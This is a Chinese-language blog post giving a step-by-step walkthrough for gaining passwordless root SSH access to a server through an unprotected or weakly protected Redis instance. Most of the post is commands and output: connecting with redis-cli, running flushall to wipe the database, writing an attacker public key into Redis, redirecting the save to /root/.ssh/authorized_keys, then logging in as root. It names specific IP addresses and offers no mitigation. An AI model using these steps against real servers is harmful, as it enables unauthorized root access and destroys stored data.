Redis远程漏洞-ssh公钥无密码入侵服务器

 


通过redis入侵服务器的原理是:

  利用了redis默认配置,许多用户没有设置访问的key。

  然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。

通过redis入侵服务器的步骤:

环境准备

服务器A:39.106.2.93

服务器B:120.78.198.173

一,生成本地ssh公钥【39.106.2.93】

生成公钥:

复制公钥文件:

1
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > key.txt

二、远程连接redis

1
./redis-cli -h 120.78.198.173 -a hello

三、清空redis

1
2
120.78.198.173:6379> flushall
OK

四、向redis写自己的公钥

1
cat key.txt | redis-cli -h 120.78.198.173 -a hello -x set redis

查看设置的redis公钥值:

1
2
3
4
5
6
[root@zhxi_3m bin]# ./redis-cli -h 120.78.198.173 -a hello
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
120.78.198.173:6379> keys *
1) "redis"
120.78.198.173:6379> get redis
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAJSk0rxWbE0Gp0WgjCSXWXpE3gLa4M9fQ/sZR5Vv4Nce3nZ0lTNoiEpEMsiPsWaVp7GEZ4sPpe2COU+nYat/KruCPahzR4NDtweGbwqcPxT+t/N3NOA3KAHkHBPyU6wk9/p7XWmfnXixCs0gOLvh7p6PTvH+Zcfgb+6Co0dHDszN6wAjgAidoHzkJbI70EPhol8WLiCWlhtz5jZdkROF5gdz4xUZWPVZk2OHXCyRPAITeKCSCZNa2LAwBMOWqcMrEIz7NJdrLLJiNA/ad1OkAz/QQHRtt root@zhxi_3m\n\n\n\n"

五、利用redis写入key到本地文件

#写入配置库的路径及存放位置

1
CONFIG SET dir "/root/.ssh/"

#写入配置库名称及存放的名字

1
CONFIG SET dbfilename "authorized_keys"

写入

1
save

退出 

1
exit

六、远程连接服务器

1
ssh root@120.78.198.173

 

posted @   Java小白的搬砖路  阅读(150)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· C#/.NET/.NET Core优秀项目和框架2025年2月简报
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 【杭电多校比赛记录】2025“钉耙编程”中国大学生算法设计春季联赛(1)
历史上的今天:
2021-01-22 2、Spring项目的创建【官网跟IDEA】
2021-01-22 1、了解SpringBoot
2021-01-22 JavaScript模拟网页时钟

喜欢请打赏

扫描二维码打赏

支付宝打赏

点击右上角即可分享
微信分享提示